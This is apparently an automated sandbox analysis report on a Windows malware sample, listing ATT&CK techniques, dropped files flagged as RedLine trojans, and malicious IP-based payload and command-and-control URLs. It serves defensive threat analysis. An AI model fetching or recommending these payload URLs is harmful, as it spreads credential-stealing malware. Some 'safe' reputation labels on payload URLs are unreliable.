Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C9460B0 listen,WSAGetLastError,	1_2_6C9460B0
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C94C030 sqlite3_bind_parameter_count,	1_2_6C94C030
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C94C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,	1_2_6C94C050
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C946070 PR_Listen,	1_2_6C946070
Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe	Code function: 1_2_6C8D22D0 sqlite3_bind_blob,	1_2_6C8D22D0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	341 Windows Management Instrumentation	11 DLL Side-Loading	1 Abuse Elevation Control Mechanism	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	13 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	1 Windows Service	11 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	11 Input Capture	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	22 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	Logon Script (Windows)	1 Windows Service	1 Abuse Elevation Control Mechanism	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	312 Process Injection	3 Obfuscated Files or Information	NTDS	289 System Information Discovery	Distributed Component Object Model	1 Email Collection	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	21 Software Packing	LSA Secrets	551 Security Software Discovery	SSH	11 Input Capture	125 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 DLL Side-Loading	Cached Domain Credentials	351 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	13 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	351 Virtualization/Sandbox Evasion	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	312 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
g77dRQ1Csm.exe	41%	Virustotal		Browse
g77dRQ1Csm.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\oyskbsuqgrwdg	100%	Avira	HEUR/AGEN.1307453
C:\Users\user\AppData\Local\Temp\cqecfsbe	100%	Avira	HEUR/AGEN.1307453
C:\Users\user\AppData\Local\Temp\u42w.0.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\oyskbsuqgrwdg	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\cqecfsbe	100%	Joe Sandbox ML
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\freebl3.dll	0%	Virustotal		Browse
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	Virustotal		Browse
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	Virustotal		Browse
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	Virustotal		Browse
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	Virustotal		Browse
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tiktok[1].exe	21%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tiktok[1].exe	38%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\FCBAECGIEB.exe	21%	ReversingLabs
C:\Users\user\AppData\Local\Temp\FCBAECGIEB.exe	38%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\cqecfsbe	57%	ReversingLabs	ByteCode-MSIL.Trojan.RedLine
C:\Users\user\AppData\Local\Temp\cqecfsbe	61%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\oyskbsuqgrwdg	57%	ReversingLabs	ByteCode-MSIL.Trojan.RedLine
C:\Users\user\AppData\Local\Temp\oyskbsuqgrwdg	61%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\u42w.0.exe	43%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\u42w.2\UIxMarketPlugin.dll	18%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\u42w.2\UIxMarketPlugin.dll	13%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\u42w.2\relay.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\u42w.2\relay.dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\u42w.3.exe	4%	ReversingLabs
C:\Users\user\AppData\Local\Temp\u42w.3.exe	3%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
note.padd.cn.com	1%	Virustotal	Browse
fp2e7a.wpc.phicdn.net	0%	Virustotal	Browse
download.iolo.net	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://www.indyproject.org/	0%	URL Reputation	safe
https://webhooklistenersfunc.azurewebsites.net/api/lookup/constella-dark-web-alerts	0%	URL Reputation	safe
https://iolo.comH42652B74-0AD8-4B60-B8FD-69ED38F7666B	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
https://sectigo.com/CPS0D	0%	URL Reputation	safe
http://185.172.128.228/BroomSetup.exe	0%	Avira URL Cloud	safe
http://185.172.128.76/3cd2b41cbde8fc9c.php	0%	Avira URL Cloud	safe
http://185.172.128.76/3cd2b41cbde8fc9c.php639c1ec5fdf4178fa648df7975496release92036e868a3837ab3d0e58	0%	Avira URL Cloud	safe
http://185.172.128.76/15f649199f40275b/mozglue.dll5	0%	Avira URL Cloud	safe
185.172.128.76/3cd2b41cbde8fc9c.php	0%	Avira URL Cloud	safe
http://185.172.128.76/15f649199f40275b/sqlite3.dll	0%	Avira URL Cloud	safe
http://download.iolo.net/ds/4/en/images/dsUSB.imaRealDefense	0%	Avira URL Cloud	safe
http://185.172.128.76/15f649199f40275b/softokn3.dll	0%	Avira URL Cloud	safe
http://185.172.128.76/3cd2b41cbde8fc9c.php	13%	Virustotal		Browse
http://185.172.128.228/BroomSetup.exe	23%	Virustotal		Browse
http://dejavu.sourceforge.nethttp://dejavu.sourceforge.netFonts	0%	Avira URL Cloud	safe
185.172.128.76/3cd2b41cbde8fc9c.php	13%	Virustotal		Browse
http://185.172.128.76/15f649199f40275b/softokn3.dll	0%	Virustotal		Browse
http://185.172.128.76/15f649199f40275b/nss3.dllUK	0%	Avira URL Cloud	safe
http://185.172.128.76/15f649199f40275b/mozglue.dll5	5%	Virustotal		Browse
http://185.172.128.59/syncUpd.exe	100%	Avira URL Cloud	malware
https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe.6-	0%	Avira URL Cloud	safe
http://185.172.128.76	0%	Avira URL Cloud	safe
http://185.172.128.76/15f649199f40275b/sqlite3.dll	9%	Virustotal		Browse
http://download.iolo.net/ds/4/en/images/dsUSB.imaRealDefense	0%	Virustotal		Browse
http://185.172.128.76/15f649199f40275b/nss3.dll	0%	Avira URL Cloud	safe
http://185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0	100%	Avira URL Cloud	malware
http://185.172.128.59/syncUpd.exe	23%	Virustotal		Browse
http://185.172.128.203/tiktok.exe	100%	Avira URL Cloud	malware
http://185.172.128.76/15f649199f40275b/mozglue.dll	0%	Avira URL Cloud	safe
http://185.172.128.203/tiktok.exe00	0%	Avira URL Cloud	safe
http://185.172.128.76	10%	Virustotal		Browse
http://185.172.128.76/15f649199f40275b/nss3.dll	0%	Virustotal		Browse
http://185.172.128.76/15f649199f40275b/softokn3.dllI	0%	Avira URL Cloud	safe
http://185.172.128.76/15f649199f40275b/msvcp140.dll	0%	Avira URL Cloud	safe
http://185.172.128.203/tiktok.exeq	0%	Avira URL Cloud	safe
http://185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0	21%	Virustotal		Browse
http://185.172.128.203/tiktok.exe	20%	Virustotal		Browse
http://185.172.128.203/tiktok.exe00	15%	Virustotal		Browse
http://note.padd.cn.com/1/Package.zip	0%	Avira URL Cloud	safe
http://185.172.128.76/3cd2b41cbde8fc9c.phpt	0%	Avira URL Cloud	safe
http://185.172.128.76/15f649199f40275b/sqlite3.dll9	0%	Avira URL Cloud	safe
http://185.172.128.76/15f649199f40275b/softokn3.dllI	5%	Virustotal		Browse
http://note.padd.cn.com/1/Package.zip	3%	Virustotal		Browse
http://185.172.128.76/15f649199f40275b/msvcp140.dll	0%	Virustotal		Browse
http://185.172.128.76/15f649199f40275b/mozglue.dll	0%	Virustotal		Browse
http://185.172.128.76/15f649199f40275b/sqlite3.dll9	8%	Virustotal		Browse
http://185.172.128.76/3cd2b41cbde8fc9c.phpt	3%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
iolo0.b-cdn.net	169.150.236.97	true	false		high
note.padd.cn.com	176.97.76.106	true	false	1%, Virustotal, Browse	unknown
svc.iolo.com	20.157.87.45	true	false		high
fp2e7a.wpc.phicdn.net	192.229.211.108	true	false	0%, Virustotal, Browse	unknown
download.iolo.net	unknown	unknown	true	0%, Virustotal, Browse	unknown
westus2-2.in.applicationinsights.azure.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.172.128.228/BroomSetup.exe	false	23%, Virustotal, Browse Avira URL Cloud: safe	unknown
185.172.128.76/3cd2b41cbde8fc9c.php	true	13%, Virustotal, Browse Avira URL Cloud: safe	low
http://185.172.128.76/3cd2b41cbde8fc9c.php	true	13%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://185.172.128.76/15f649199f40275b/sqlite3.dll	true	9%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://185.172.128.76/15f649199f40275b/softokn3.dll	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://185.172.128.59/syncUpd.exe	false	23%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://185.172.128.76/15f649199f40275b/nss3.dll	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0	false	21%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://185.172.128.76/15f649199f40275b/mozglue.dll	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://185.172.128.203/tiktok.exe	false	20%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://185.172.128.76/15f649199f40275b/msvcp140.dll	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://svc.iolo.com/__svc/sbv/DownloadManager.ashx	false		high
http://note.padd.cn.com/1/Package.zip	false	3%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://185.172.128.76/3cd2b41cbde8fc9c.php639c1ec5fdf4178fa648df7975496release92036e868a3837ab3d0e58	u42w.0.exe, 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtab	MSBuild.exe, 00000010.00000002.2894768598.0000000003233000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.00000000035EA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	MSBuild.exe, 00000010.00000002.2894768598.000000000322F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003647000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003233000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.00000000035EA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://monitor.azure.com//.default	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950046011.00000173F4B60000.00000004.08000000.00040000.00000000.sdmp	false		high
http://www.vmware.com/0	run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmp	false		high
https://snapshot.monitor.azure.com/&	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950046011.00000173F4B60000.00000004.08000000.00040000.00000000.sdmp	false		high
http://svc.iolo.com/__svc/sbv/DownloadManager.ashx.	u42w.3.exe, 00000005.00000003.2038133988.0000000002674000.00000004.00001000.00020000.00000000.sdmp, u42w.3.exe, 00000005.00000003.2038133988.00000000025D6000.00000004.00001000.00020000.00000000.sdmp, u42w.3.exe, 00000005.00000003.2038133988.0000000002639000.00000004.00001000.00020000.00000000.sdmp	false		high
https://scripts.sil.org/OFLhttps://indiantypefoundry.comNinad	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951073857.00000173F4CC0000.00000004.08000000.00040000.00000000.sdmp	false		high
https://www.iolo.com/company/legal/sales-policy/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380001000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.indyproject.org/	g77dRQ1Csm.exe, 00000000.00000003.1773870952.0000000005E0E000.00000004.00000020.00020000.00000000.sdmp, u42w.3.exe, 00000005.00000000.1772107020.000000000041C000.00000020.00000001.01000000.0000000C.sdmp, u42w.3.exe, 00000005.00000003.2038133988.0000000002632000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.iolo.com/support/solutions/articles/44001781185?	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951073857.00000173F4CC0000.00000004.08000000.00040000.00000000.sdmp	false		high
https://www.iolo.com/company/legal/privacy/?	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951073857.00000173F4CC0000.00000004.08000000.00040000.00000000.sdmp	false		high
http://www.codeplex.com/CompositeWPF	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2944001193.00000173F47A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380001000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.iolo.com/support/solutions/articles/44001781185	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380395000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380001000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.172.128.76/15f649199f40275b/mozglue.dll5	u42w.0.exe, 00000001.00000002.2090394875.0000000002FB5000.00000004.00000020.00020000.00000000.sdmp	false	5%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://scripts.sil.org/OFL	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2968747897.00000173F9182000.00000004.00000800.00020000.00000000.sdmp	false		high
https://taskscheduler.codeplex.com/H	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp	false		high
https://www.iolo.com/company/legal/sales-policy/?	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951073857.00000173F4CC0000.00000004.08000000.00040000.00000000.sdmp	false		high
https://scripts.sil.org/OFLX8	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2968747897.00000173F9182000.00000004.00000800.00020000.00000000.sdmp	false		high
https://westus2-2.in.applicationinsights.azure.com	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380233000.00000004.00000800.00020000.00000000.sdmp	false		high
https://webhooklistenersfunc.azurewebsites.net/api/lookup/constella-dark-web-alerts	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380001000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380233000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false		high
https://indiantypefoundry.com	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2968747897.00000173F9182000.00000004.00000800.00020000.00000000.sdmp	false		high
https://download.avira.com/download/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380001000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.codeplex.com/prism#Microsoft.Practices.Prism.ViewModel	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2944001193.00000173F47A0000.00000004.08000000.00040000.00000000.sdmp	false		high
http://dejavu.sourceforge.net	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp	false		high
http://www.mozilla.com/en-US/blocklist/	u42w.0.exe, u42w.0.exe, 00000001.00000002.2117710896.000000006C07D000.00000002.00000001.01000000.00000011.sdmp	false		high
https://www.iolo.com/company/legal/privacy/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380001000.00000004.00000800.00020000.00000000.sdmp	false		high
http://download.iolo.net/ds/4/en/images/dsUSB.imaRealDefense	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380001000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	MSBuild.exe, 00000010.00000002.2894768598.000000000322F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003647000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003233000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.00000000035EA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://rt.services.visualstudio.com/l	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950046011.00000173F4B60000.00000004.08000000.00040000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	u42w.0.exe, 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmp, u42w.0.exe, 00000001.00000003.1767072510.00000000231BD000.00000004.00000020.00020000.00000000.sdmp	false		high
http://gdlp01.c-wss.com/rmds/ic/universalinstaller/common/checkconnection	run.exe, run.exe, 00000002.00000000.1746274601.000000000083C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000002.00000002.1804456398.000000000083C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000F.00000000.1987893127.000000000083C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000F.00000002.2045446560.000000000083C000.00000002.00000001.01000000.00000009.sdmp	false		high
https://dc.services.visualstudio.com/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380233000.00000004.00000800.00020000.00000000.sdmp	false		high
https://pastebin.com/raw/z9pYkqPQPO	MSBuild.exe, 00000019.00000002.2209535143.0000000003271000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	MSBuild.exe, 00000010.00000002.2894768598.0000000003297000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.000000000322F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003647000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.0000000003233000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2894768598.00000000035EA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.symauth.com/cps0(	run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	u42w.0.exe, 00000001.00000003.1866630747.0000000029656000.00000004.00000020.00020000.00000000.sdmp	false		high
http://dejavu.sourceforge.nethttp://dejavu.sourceforge.netFonts	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://iolo.comH42652B74-0AD8-4B60-B8FD-69ED38F7666B	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380001000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.172.128.76/15f649199f40275b/nss3.dllUK	u42w.0.exe, 00000001.00000002.2090394875.0000000002F5C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://dc.services.visualstudio.com/f	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950046011.00000173F4B60000.00000004.08000000.00040000.00000000.sdmp	false		high
https://profiler.monitor.azure.com/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380233000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.symauth.com/rpa00	run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.newtonsoft.com/jsonschema	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2948318292.00000173F4AB0000.00000004.08000000.00040000.00000000.sdmp	false		high
http://www.info-zip.org/	run.exe, 00000002.00000002.1805902147.000000000398E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.00000000053DF000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003DF5000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.00000000053D8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe.6-	u42w.3.exe, 00000005.00000003.2038133988.00000000025F4000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://westus2-2.in.applicationinsights.azure.com/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2938981217.00000173F3C1D000.00000004.00000020.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2887291650.0000017380233000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.iolo.com/company/legal/eula/?	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951073857.00000173F4CC0000.00000004.08000000.00040000.00000000.sdmp	false		high
http://185.172.128.76	u42w.0.exe, 00000001.00000002.2090394875.0000000002F5C000.00000004.00000020.00020000.00000000.sdmp	true	10%, Virustotal, Browse Avira URL Cloud: safe	unknown
